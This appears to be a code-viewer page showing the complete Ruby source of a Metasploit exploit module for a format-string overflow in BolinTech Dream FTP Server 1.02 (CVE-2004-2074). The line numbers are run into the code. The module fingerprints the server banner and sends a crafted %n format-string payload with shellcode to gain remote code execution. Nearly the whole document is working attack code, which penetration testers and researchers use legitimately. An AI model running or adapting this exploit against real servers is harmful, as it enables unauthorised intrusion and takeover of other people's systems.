Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/ftp/dreamftp_format.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'BolinTech Dream FTP Server 1.02 Format String',13'Description' => %q{14This module exploits a format string overflow in the BolinTech15Dream FTP Server version 1.02. Based on the exploit by SkyLined.16},17'Author' => [ 'aushack' ],18'Arch' => [ ARCH_X86 ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'CVE', '2004-2074'],23[ 'OSVDB', '4986'],24[ 'BID', '9800'],25[ 'EDB', '823']26],27'Platform' => ['win'],28'Privileged' => false,29'Payload' =>30{31'Space' => 1000,32'BadChars' => "\x00\x0a\x0d",33'StackAdjustment' => -3500,34},35'Targets' =>36[37# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.38[39'Dream FTP Server v1.02 Universal',40{41'Offset' => 3957680, # 0x3c63ff-0x4f42}43],44],45'DisclosureDate' => '2004-03-03',46'DefaultTarget' => 0))4748register_options(49[50Opt::RPORT(21),51])52end5354def check55connect56banner = sock.get_once57disconnect58if (banner.to_s =~ /Dream FTP Server/)59return Exploit::CheckCode::Detected60end61return Exploit::CheckCode::Safe62end6364def exploit65connect66select(nil,nil,nil,0.25)67sploit = "\xeb\x29"68sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"69sploit << "@@@@@@@@" + payload.encoded70sock.put(sploit + "\r\n")71select(nil,nil,nil,0.25)72handler73disconnect74end75end767778